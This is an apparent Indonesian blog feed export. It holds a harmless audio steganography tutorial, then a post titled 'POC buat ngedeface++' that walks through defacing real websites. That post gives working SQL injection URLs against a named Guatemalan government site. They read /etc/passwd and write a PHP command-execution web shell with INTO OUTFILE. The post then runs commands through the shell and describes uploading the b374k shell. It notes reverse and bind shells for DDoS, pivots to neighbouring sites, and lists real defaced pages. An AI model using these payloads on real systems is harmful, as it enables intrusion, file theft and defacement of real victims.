<li>Mengcopy channel pertama pada Suara pesan dan ditaruh ke Channel kedua Suara Carrier seperti gambar dibawah :</li>
</ol>
<p><img class="aligncenter size-full wp-image-201" title="2" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/2.jpg" alt="" width="100%" /></p>
<p><strong>Melakukan Peningkatan Oktaf Pada Suara Pesan</strong></p>
<ol>
<li>Memblok bagian channel Suara pesan dengan cara dabel klik</li>
<li>Klik menu Effects =&gt; Pitch =&gt; Shift , seperti gambar dibawah :</li>
</ol>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/3.jpg"><img class="aligncenter size-full wp-image-202" title="3" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/3.jpg" alt="" width="100%" /></a></p>
<p>3. Ubah Sametones to shift pitch by menjadi 20 seperti digambar berikut</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/4.jpg"><img class="aligncenter size-full wp-image-203" title="4" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/4.jpg" alt="" width="370" height="339" /></a></p>
<p>Yang mengakibatkan suara pesan dari 43 detik menjadi 13 detik</p>
<p><strong>C. Tahap Ketiga</strong></p>
<ol>
<li><strong></strong>Melakukan Pemotongan dan penyebaran Suara pesan.</li>
<li>Memblok dan Mengcutnya, seperti gambar di bawah ini :</li>
</ol>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/5.jpg"><img class="aligncenter size-full wp-image-204" title="5" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/5.jpg" alt="" width="415" height="388" /></a></p>
<p>3. Susun dengan bantuan 1. Even Tool hinga menjadi seperti gambar dibawah ini :</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/7.jpg"><img class="aligncenter size-full wp-image-209" title="7" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/7.jpg" alt="" width="100%" /></a></p>
<p><strong>D. Tahap Ke Empat</strong></p>
<ol>
<li>Mengubah Volume Suara pada Channel Suara Pesan.</li>
<li>Blok channel suara pesan dengan dabel klik pada channel suara pesan</li>
<li>Klik menu Process =&gt; Volume, seperti gambar dibawah ini :</li>
</ol>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/8.jpg"><img class="aligncenter size-full wp-image-206" title="8" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/8.jpg" alt="" width="100%" /></a>4. Ubah volume suara pesan menjadi 5% dari suara aslinya</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/9.jpg"><img class="aligncenter size-full wp-image-207" title="9" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/9.jpg" alt="" width="441" height="333" /></a></p>
<p style="text-align: center;"><strong>Prosses Steganografi Selesai</strong></p>
<p>Suara pesan akan tersamarkan oleh suara carrier dengan tampilan gelombang suara seperti gambar berikut :</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/10.jpg"><img class="aligncenter size-full wp-image-208" title="10" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/10.jpg" alt="" width="100%" /></a></p>
<p>Dan Hasil Suaranya Sebagai Berikut :</p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="275" height="310" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://0james0.tk/JamesAmp.swf" /><param name="wmode" value="transparent" /><embed type="application/x-shockwave-flash" width="275" height="310" src="http://0james0.tk/JamesAmp.swf" wmode="transparent"></embed></object></p>
<p style="text-align: center;"><strong>Proses Decript</strong></p>
<p>Agar Pesan dapat didengar oleh si penerima pesan maka sipenerima pesan melakukan decript terlebih dahulu agar dapat mendengarkan pesan rahasia yang tersimpan pada suara carrier</p>
<p>Caranya dengan :</p>
<ol>
<li>Mendelete Channel Suara carrier</li>
<li>Mengembalikan Ukuran Volume Suara</li>
<li>Mengabungkan potongan-potongan pesan dengan Event Tool</li>
<li>Mengembalikan oktaf suara pesan</li>
</ol>
<p style="text-align: center;"><strong>Proses Steganografi Audio Mengunakan S-Tool</strong></p>
<p style="text-align: center;">
<p style="text-align: left;">1. Bukalah Program <strong>S-Tools</strong> yang telah sediakan    dalam dengan <strong>Mendouble Clik icon S-tools.exe</strong></p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/11.jpg"><img class="aligncenter size-full wp-image-212" title="1" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/11.jpg" alt="" width="410" height="286" /></a></p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/11.jpg"></a>2. Setelah itu anda akan melihat tampilan awal seperti ini.</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/21.jpg"><img class="aligncenter size-full wp-image-213" title="2" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/21.jpg" alt="" width="458" height="300" /></a></p>
<p>3. Lalu, Setelah itu Drag lah File yang anda inginkan kedalam bidang kosong S-Tools sebagai media penyembunyian (<em>carrier audio</em>). Dalam hal ini penulis akan mendrag Sebuah File Wav dengan nama<strong> </strong><strong>Indonesia Jaya.wav.</strong></p>
<p><strong><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/31.jpg"><img class="aligncenter size-full wp-image-214" title="3" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/31.jpg" alt="" width="466" height="326" /></a><br />
</strong></p>
<p><strong><span style="font-weight: normal;">4. Akan tampil jendela Hiding. Isikan pada kotak <strong>PASSPHRASE</strong> sandi rahasia yang anda inginkan. Dalam hal ini akan mengisikannya dengan karakter “<strong>suhada</strong>”.</span></strong></p>
<p><strong><span style="font-weight: normal;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/41.jpg"><img class="aligncenter size-full wp-image-215" title="4" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/41.jpg" alt="" width="559" height="226" /></a><br />
</span></strong></p>
<p>5. Pada kotak <strong>VERIFY PASSPHRASE. </strong>Isikan juga sandi yang sama.</p>
<p>6. Kemudian Pilihlah jenis Algoritma pada kotak <strong>Encryption Algorithm</strong>. Dalam hal ini penulis menggunakan <strong>IDEA</strong>.<br />
7. Klik ok untuk memulai proses <em>Steganografi</em>.<br />
8. Proses Steganografi akan berlangsung. Selama Proses, jendela Action akan menunjukan kemajuan prosesnya. Perhatikan Bagian <strong>Progess</strong>.</p>
<p>9. Setelah proses berakhir, akan tampil jendela baru yang bernama “<strong>hidden data</strong>”</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/51.jpg"><img class="aligncenter size-full wp-image-216" title="5" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/51.jpg" alt="" width="470" height="386" /></a></p>
<p>10. Untuk menyimpannya, klik kanan pada bidang “<strong>hidden data</strong>” dan pilih menu <strong>Save As.</strong></p>
<p><strong><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/61.jpg"><img class="aligncenter size-full wp-image-217" title="6" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/61.jpg" alt="" width="459" height="380" /></a><br />
</strong></p>
<p>11. Pada kotak Save As yang tampil, beri nama file yang baru pada kotak <strong>File Name. </strong>pada hal ini penulis memberikan namanya dengan <strong>Result.WAV</strong>.</p>
<p>12. Klik tombol <strong>Save</strong>.</p>
<p>13. File carrier dan file hidden harus memiliki ukuran yang sama, seperti pada gambar dibawah ini akan ditujukan ukuran file tersebut.</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/71.jpg"><img class="aligncenter size-full wp-image-218" title="7" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/71.jpg" alt="" width="484" height="222" /></a></p>
<p>14. Untuk me-<em>reveal</em> sama dengan proses <em>embedding</em>, buka jendela result klik kanan klik <em>reveal</em>. Isi password yang sama dengan saat <em>embedding</em> Seperti pada gambar dibawah ini:</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/81.jpg"><img class="aligncenter size-full wp-image-219" title="8" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/81.jpg" alt="" width="465" height="348" /></a></p>
<p>15. Maka akan muncul file audio yang akan telah di steganografi, seperti pada gambar dibawah ini:</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/91.jpg"><img class="aligncenter size-full wp-image-220" title="9" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/91.jpg" alt="" width="225" height="158" /></a></p>
<p>16. Dan save file <em>carrier</em> dengan nama yang sama yaitu IndonesiaJaya.WAV</p>
<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/101.jpg"><img class="aligncenter size-full wp-image-221" title="10" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/12/101.jpg" alt="" width="438" height="273" /></a></p>
<p>17. Setelah melakukan proses reveal maka file audio yang sudah di strganografi tidak akan ditemukan lagi</p>
<p style="text-align: center;">
<p style="text-align: center;">Isi Pesan:</p>
<p style="text-align: center;">Ni hao?</p>
<p style="text-align: center;">Wo tu hen hao, ni jiao Moch Suhada</p>
<p style="text-align: center;">====================================</p>
<p style="text-align: center;">Shìshàng zhiyou mama hao</p>
<p style="text-align: center;">
<p style="text-align: center;">Di dunia ini, Ibu yang terbaik</p>
<p style="text-align: center;">
<p style="text-align: center;">Dinyanyikan oleh : Kevin</p>
<p style="text-align: center;">
<p style="text-align: center;">Shìshàng zhiyou mama hao</p>
<p style="text-align: center;">
<p style="text-align: center;">Di dunia ini hanya ibu yang terbaik</p>
<p style="text-align: center;">
<p style="text-align: center;">You ma de háizi xiàng gè bao</p>
<p style="text-align: center;">
<p style="text-align: center;">Anak yang memiliki ibu bagaikan harta</p>
<p style="text-align: center;">
<p style="text-align: center;">Tóu jìn mama de huáibào</p>
<p style="text-align: center;">
<p style="text-align: center;">Berada dalam pelukan ibu</p>
<p style="text-align: center;">
<p style="text-align: center;">Xìngfú xiang bùliao</p>
<p style="text-align: center;">=======================================</p>
<p style="text-align: center;">Dào xiang – zhou Jiélún</p>
<p style="text-align: center;">
<p style="text-align: center;">Wangi Padi – Jay Zhou</p>
<p style="text-align: center;">
<p style="text-align: center;">dui zhe ge shi jie, ruo guo ni you tai duo de bao yuan</p>
<p style="text-align: center;">
<p style="text-align: center;">jika kau terlalu banyak mengeluhkan dunia ini</p>
<p style="text-align: center;">
<p style="text-align: center;">die dao le, jiu bu gan ji xu wang qian zou</p>
<p style="text-align: center;">
<p style="text-align: center;">saat terjatuh kau tak berani kembali melangkah</p>
<p style="text-align: center;">
<p style="text-align: center;">wei shen me, ren yao zhe me de cui ruo, duo luo</p>
<p style="text-align: center;">
<p style="text-align: center;">mengapa manusia begitu lemah ?</p>
<p style="text-align: center;">
<p style="text-align: center;">qing ni da kai dian shi kan kan</p>
<p style="text-align: center;">
<p style="text-align: center;">coba kau lihat di televisi</p>
<p style="text-align: center;">xie-xie</p>
<p style="text-align: center;">terima kasih</p>
<p style="text-align: center;">
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/steganografi-audio/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://www.james0baster.web.id/v2/steganografi-audio/&amp;n=Steganografi+Audio&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://www.james0baster.web.id/v2/steganografi-audio/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://www.james0baster.web.id/v2/steganografi-audio/&amp;title=Steganografi+Audio" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://www.james0baster.web.id/v2/steganografi-audio/&amp;title=Steganografi+Audio" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://www.james0baster.web.id/v2/steganografi-audio/&amp;title=Steganografi+Audio&amp;desc=%C2%97Steganografi%20adalah%20seni%20dan%20ilmu%20menulis%C2%A0pesan%C2%A0tersembunyi%20atau%20menyembunyikan%20pesan%20dengan%20suatu%20cara%20sehingga%20selain%20si%20pengirim%20dan%20si%20penerima%2C%20tidak%20ada%20seorangpun%20yang%20mengetahui%20atau%20menyadari%20bahwa%20ada%20suatu%20pesan%20rahasia.%0D%0A%0D%0A%C2%97Teknik%20steganografi%20meliputi%20banyak%20sekali%20metode%20komunikas" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://www.james0baster.web.id/v2/steganografi-audio/&amp;t=Steganografi+Audio" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-gmail">
			<a href="https://mail.google.com/mail/?ui=2&amp;view=cm&amp;fs=1&amp;tf=1&amp;su=Steganografi+Audio&amp;body=Link: http://www.james0baster.web.id/v2/steganografi-audio/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %C2%97Steganografi%20adalah%20seni%20dan%20ilmu%20menulis%C2%A0pesan%C2%A0tersembunyi%20atau%20menyembunyikan%20pesan%20dengan%20suatu%20cara%20sehingga%20selain%20si%20pengirim%20dan%20si%20penerima%2C%20tidak%20ada%20seorangpun%20yang%20mengetahui%20atau%20menyadari%20bahwa%20ada%20suatu%20pesan%20rahasia.%0D%0A%0D%0A%C2%97Teknik%20steganografi%20meliputi%20banyak%20sekali%20metode%20komunikas" rel="nofollow" class="external" title="Email this via Gmail">Email this via Gmail</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://www.james0baster.web.id/v2/steganografi-audio/&amp;title=Steganografi+Audio" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://www.james0baster.web.id/v2/steganografi-audio/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-googlereader">
			<a href="http://www.google.com/reader/link?url=http://www.james0baster.web.id/v2/steganografi-audio/&amp;title=Steganografi+Audio&amp;srcUrl=http://www.james0baster.web.id/v2/steganografi-audio/&amp;srcTitle=Steganografi+Audio&amp;snippet=%C2%97Steganografi%20adalah%20seni%20dan%20ilmu%20menulis%C2%A0pesan%C2%A0tersembunyi%20atau%20menyembunyikan%20pesan%20dengan%20suatu%20cara%20sehingga%20selain%20si%20pengirim%20dan%20si%20penerima%2C%20tidak%20ada%20seorangpun%20yang%20mengetahui%20atau%20menyadari%20bahwa%20ada%20suatu%20pesan%20rahasia.%0D%0A%0D%0A%C2%97Teknik%20steganografi%20meliputi%20banyak%20sekali%20metode%20komunikas" rel="nofollow" class="external" title="Add this to Google Reader">Add this to Google Reader</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://www.james0baster.web.id/v2/steganografi-audio/&amp;t=Steganografi+Audio" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-hotmail">
			<a href="http://mail.live.com/?rru=compose?subject=Steganografi+Audio&amp;body=Link: http://www.james0baster.web.id/v2/steganografi-audio/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %C2%97Steganografi%20adalah%20seni%20dan%20ilmu%20menulis%C2%A0pesan%C2%A0tersembunyi%20atau%20menyembunyikan%20pesan%20dengan%20suatu%20cara%20sehingga%20selain%20si%20pengirim%20dan%20si%20penerima%2C%20tidak%20ada%20seorangpun%20yang%20mengetahui%20atau%20menyadari%20bahwa%20ada%20suatu%20pesan%20rahasia.%0D%0A%0D%0A%C2%97Teknik%20steganografi%20meliputi%20banyak%20sekali%20metode%20komunikas" rel="nofollow" class="external" title="Email this via Hotmail">Email this via Hotmail</a>
		</li>
		<li class="shr-mail">
			<a href="mailto:?subject=%22Steganografi%20Audio%22&amp;body=Link: http://www.james0baster.web.id/v2/steganografi-audio/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %C2%97Steganografi%20adalah%20seni%20dan%20ilmu%20menulis%C2%A0pesan%C2%A0tersembunyi%20atau%20menyembunyikan%20pesan%20dengan%20suatu%20cara%20sehingga%20selain%20si%20pengirim%20dan%20si%20penerima%2C%20tidak%20ada%20seorangpun%20yang%20mengetahui%20atau%20menyadari%20bahwa%20ada%20suatu%20pesan%20rahasia.%0D%0A%0D%0A%C2%97Teknik%20steganografi%20meliputi%20banyak%20sekali%20metode%20komunikas" rel="nofollow" class="external" title="Email this to a friend?">Email this to a friend?</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://www.james0baster.web.id/v2/steganografi-audio/&amp;bm_description=Steganografi+Audio&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://www.james0baster.web.id/v2/steganografi-audio/&amp;title=Steganografi+Audio" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://www.james0baster.web.id/v2/steganografi-audio/&amp;t=Steganografi+Audio" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-plurk">
			<a href="http://www.plurk.com/m?content=Steganografi+Audio+-+http://www.james0baster.web.id/v2/steganografi-audio/&amp;qualifier=shares" rel="nofollow" class="external" title="Share this on Plurk">Share this on Plurk</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://www.james0baster.web.id/v2/steganografi-audio/&amp;title=Steganografi+Audio" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://www.james0baster.web.id/v2/steganografi-audio/&amp;title=Steganografi+Audio" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://www.james0baster.web.id/v2/steganografi-audio/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Steganografi+Audio+-+http://bit.ly/eqxLWQ&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoobuzz">
			<a href="http://buzz.yahoo.com/submit/?submitUrl=http://www.james0baster.web.id/v2/steganografi-audio/&amp;submitHeadline=Steganografi+Audio&amp;submitSummary=%C2%97Steganografi%20adalah%20seni%20dan%20ilmu%20menulis%C2%A0pesan%C2%A0tersembunyi%20atau%20menyembunyikan%20pesan%20dengan%20suatu%20cara%20sehingga%20selain%20si%20pengirim%20dan%20si%20penerima%2C%20tidak%20ada%20seorangpun%20yang%20mengetahui%20atau%20menyadari%20bahwa%20ada%20suatu%20pesan%20rahasia.%0D%0A%0D%0A%C2%97Teknik%20steganografi%20meliputi%20banyak%20sekali%20metode%20komunikas&amp;submitCategory=science&amp;submitAssetType=text" rel="nofollow" class="external" title="Buzz up!">Buzz up!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=Steganografi+Audio&amp;body=Link: http://www.james0baster.web.id/v2/steganografi-audio/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %C2%97Steganografi%20adalah%20seni%20dan%20ilmu%20menulis%C2%A0pesan%C2%A0tersembunyi%20atau%20menyembunyikan%20pesan%20dengan%20suatu%20cara%20sehingga%20selain%20si%20pengirim%20dan%20si%20penerima%2C%20tidak%20ada%20seorangpun%20yang%20mengetahui%20atau%20menyadari%20bahwa%20ada%20suatu%20pesan%20rahasia.%0D%0A%0D%0A%C2%97Teknik%20steganografi%20meliputi%20banyak%20sekali%20metode%20komunikas" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a class="wpptopdf" target="_blank" rel="noindex,nofollow" href="http://www.james0baster.web.id/v2/steganografi-audio/?format=pdf" title="Download PDF">http://www.james0baster.web.id/v2/wp-content/plugins/wp-post-to-pdf/asset/images/pdf.png</a>]]></content:encoded>
			<wfw:commentRss>http://www.james0baster.web.id/v2/steganografi-audio/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>POC buat ngedeface++</title>
		<link>http://www.james0baster.web.id/v2/poc-buat-ngedeface/</link>
		<comments>http://www.james0baster.web.id/v2/poc-buat-ngedeface/#comments</comments>
		<pubDate>Sat, 07 Aug 2010 05:38:04 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[..::james0baster::..]]></category>
		<category><![CDATA[Berita dan Pengumuman]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[ICT]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Jaringan Komputer]]></category>
		<category><![CDATA[Keamanan]]></category>
		<category><![CDATA[Keamanan & Perbaikan WEB]]></category>
		<category><![CDATA[Komputer]]></category>
		<category><![CDATA[Tips and Trick]]></category>

		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=164</guid>
		<description><![CDATA[<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/deface.jpg"><img class="alignleft size-full wp-image-167" title="deface" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/deface.jpg" alt="" width="249" height="211" /></a>Wah dah lama ga ngeblog</p>
<p>kali ini gw mau share beberapa teknik2(POC) buat ngedeface .</p>
<p>kalo yang sudah pada tau teknik2 ini jangan pada ngina</p>
<p>yah maklum nubie mau coba bikin artikel <img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/6.gif" style="border:none;background:none;" alt=":p" /></p>
<p>yang sudah baca yah jangan lupa komen2nya</p>
<p>yah itung2 belajar bareng <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>ok mulai aja deh ke tutor</p>
<p><span id="more-164"></span></p>
<p>hal yg diperlukan :</p>
<ol>
<li>berdoa</li>
<li>siapin makanan ringan</li>
<li>dan segelas kopi (java)</li>
<li>koneksi internet + komputernya <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </li>
</ol>
<p>nah kalo udah pada siap liangsung pergi ke om <a href="http://google.co.id">google </a> untuk melakukan pencarian dengan dork :</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/googeling.jpg"><img class="size-full wp-image-155 aligncenter" title="googeling" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/googeling.jpg" alt="" width="614" /></a></p>
<p>kemudian pilih deh web target yang memiliki vulnerability <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>target : <a href="http://www.inacif.gob.gt/index.php?showPage=125&amp;nwid=-7'+union+select+1,2,0x3C6120687265663D22687474703A2F2F6A616D6573306261737465722E7765622E6964223E6A616D6573306261737465723C2F613E,4,5,6,load_file('/etc/passwd'),8,9,10/*">http://www.inacif.gob.gt/index.php?showPage=125&amp;nwid=-7&#8242;+union+select+1,2,0&#215;3C6120687265663D22687474703A2F2F6A616D6573306261737465722E7765622E6964223E6A616D6573306261737465723C2F613E,4,5,6,load_file(&#8216;/etc/passwd&#8217<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" />,8,9,10/*</a></p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/target.jpg"><img class="size-full wp-image-158 aligncenter" title="target" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/target.jpg" alt="" width="614" /></a></p>
<p>setelah masuk ke website targget ubah url nya yg tadinya <span style="color: #ff0000;">load_file(&#8216;/etc/passwd&#8217<img src="http://www.james0baster.web.id/v2/wp-content/plugins/kaskus-emoticons/emoticons/13.gif" style="border:none;background:none;" alt=";)" /> <span style="color: #000000;">menjadi</span></span></p>
<p><span style="color: #ff0000;"><span style="color: #000000;"> <span style="color: #ff0000;">&#8220;&lt;?php echo \&#8217;&lt;pre&gt;\&#8217;;system($_GET[\'cmd\']);echo \&#8217;&lt;/pre&gt;\&#8217;;?&gt;&#8221;</span> </span></span></p>
<p><span style="color: #ff0000;"><span style="color: #000000;">dan diakhir url ditambahkan </span></span></p>
<p><span style="color: #ff0000;"><span style="color: #000000;"><span style="color: #ff0000;"> +INTO+OUTFILE+&#8221;lokasi direktory(folder) yang permisionya 777/namashell.php&#8221;/*</span></span></span></p>
<p><span style="color: #ff0000;"><span style="color: #000000;">real target : <a href="http://www.inacif.gob.gt/index.php?showPage=125&amp;nwid=-7'+union+select+1,2,3,4,5,6,&quot;&lt;?php echo \'&lt;pre&gt;\';system($_GET[\'cmd\']);echo \'&lt;/pre&gt;\';?&gt;&quot;,8,9,10+INTO+OUTFILE+&quot;/home/inacif/www/design/default/james0bastershell.php&quot;/*">http://www.inacif.gob.gt/index.php?showPage=125&amp;nwid=-7&#8242;+union+select+1,2,3,4,5,6,&#8221;&lt;?php echo \&#8217;&lt;pre&gt;\&#8217;;system($_GET[\'cmd\']);echo \&#8217;&lt;/pre&gt;\&#8217;;?&gt;&#8221;,8,9,10+INTO+OUTFILE+&#8221;/home/inacif/www/design/default/james0bastershell.php&#8221;/*</a></span></span></p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/spown.jpg"><img class="size-large wp-image-157 aligncenter" title="spown" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/spown-1024x306.jpg" alt="" width="614" /></a></p>
<p><span style="color: #ff0000;"><span style="color: #000000;"><br />
</span></span></p>
<p>setelah berhasil membuat shell dari sql injection sebaiknya di coba terlebih dahulu apakah berhasil</p>
<p>atau tidak dengan menjalankan perintah ls -al pada cmd=</p>
<p>real target : <a href="http://www.inacif.gob.gt/design/default/james0bastershell.php?cmd=ls%20-al">http://www.inacif.gob.gt/design/default/james0bastershell.php?cmd=ls -al</a></p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/shell-sederhana.jpg"><img class="size-full wp-image-156 aligncenter" title="shell sederhana" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/shell-sederhana.jpg" alt="" width="614" /></a></p>
<p>upload deh shell yg lebih familiar buat anda digunakan seperti saya b374k.php <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  dengan perintah</p>
<p>download sebagai berikut :</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/upload.jpg"><img class="size-large wp-image-159 aligncenter" title="upload" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/upload-1024x434.jpg" alt="" width="614" /></a></p>
<p>dan hasilnya sebagai berikut :</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/shell.jpg"><img class="size-large wp-image-165 aligncenter" title="shell" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/shell-1024x442.jpg" alt="" width="614" /></a></p>
<p>bisa backconnect sama bind, lumayan buat DDOS atau apalah soalnya servernya ga make firewall.</p>
<p>kalo belom bisa ngeroot bisa pake teknik jumping karena di dalemnya ada 21 readable user directory</p>
<p style="text-align: center;"><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/scaner.jpg"><img class="size-full wp-image-166 aligncenter" title="scaner" src="http://www.james0baster.web.id/v2/wp-content/uploads/2010/08/scaner.jpg" alt="" width="444" height="495" /></a></p>
<p>berikut hasil URL jumpingan dari <a href="http://www.inacif.gob.gt/" target="_self">http://www.inacif.gob.gt/</a> ke  <a href="http://www.cinde.com.gt/" target="_self">http://www.cinde.com.gt/</a></p>
<p>URL : <a href="http://www.inacif.gob.gt/design/default/b374k.php?y=/home2/cinde/cinde-www/webcontrol/">http://www.inacif.gob.gt/design/default/b374k.php?y=/home2/cinde/cinde-www/webcontrol/</a></p>
<p>dan berikut hasil defaceannya <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<ul>
<li><a href="http://www.cinde.com.gt/webcontrol/james0baster.html">http://www.cinde.com.gt/webcontrol/james0baster.html</a></li>
<li><a href="http://www.amchamguatebusiness.com/media/Image/Julio_ago/james0baster.html">http://www.amchamguatebusiness.com/media/Image/Julio_ago/james0baster.html</a></li>
<li><a href="http://www.asociacioncambiandovidas.org/media/Image/james0baster.html">http://www.asociacioncambiandovidas.org/media/Image/james0baster.html</a></li>
<li><a href="http://sanjuansacatepequez.com.gt/media/Image/james0baster.html">http://sanjuansacatepequez.com.gt/media/Image/james0baster.html</a></li>
